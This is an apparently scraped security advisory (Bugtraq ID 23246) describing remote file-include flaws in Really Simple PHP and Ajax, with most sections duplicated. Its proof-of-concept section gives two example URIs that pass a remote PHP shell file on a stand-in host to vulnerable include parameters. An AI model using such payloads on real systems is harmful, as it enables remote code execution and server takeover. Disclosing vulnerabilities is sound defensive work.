Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
BID:23246
Info
Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23246 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 29 2007 12:00AM |
| Updated: | Apr 03 2007 12:12AM |
| Credit: | Hamid Ebadi is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
RSPA RSPA 2007-03-23 |
| Not Vulnerable: | |
Discussion
Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
Really Simple PHP and Ajax is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Really Simple PHP and Ajax version rspa-2007-03-23 is vulnerable to these issues.
Really Simple PHP and Ajax is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Really Simple PHP and Ajax version rspa-2007-03-23 is vulnerable to these issues.
Exploit / POC
Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://example2/phpshell.txt/?
http://www.example.com/rspa/framework/Controller_v4.php?__ClassPath=http://example2/phpshell.txt/?
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://example2/phpshell.txt/?
http://www.example.com/rspa/framework/Controller_v4.php?__ClassPath=http://example2/phpshell.txt/?
Solution / Fix
Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Really Simple PHP and Ajax Multiple Remote File Include Vulnerabilities
References:
References:
- RSPA Home Page (RSPA)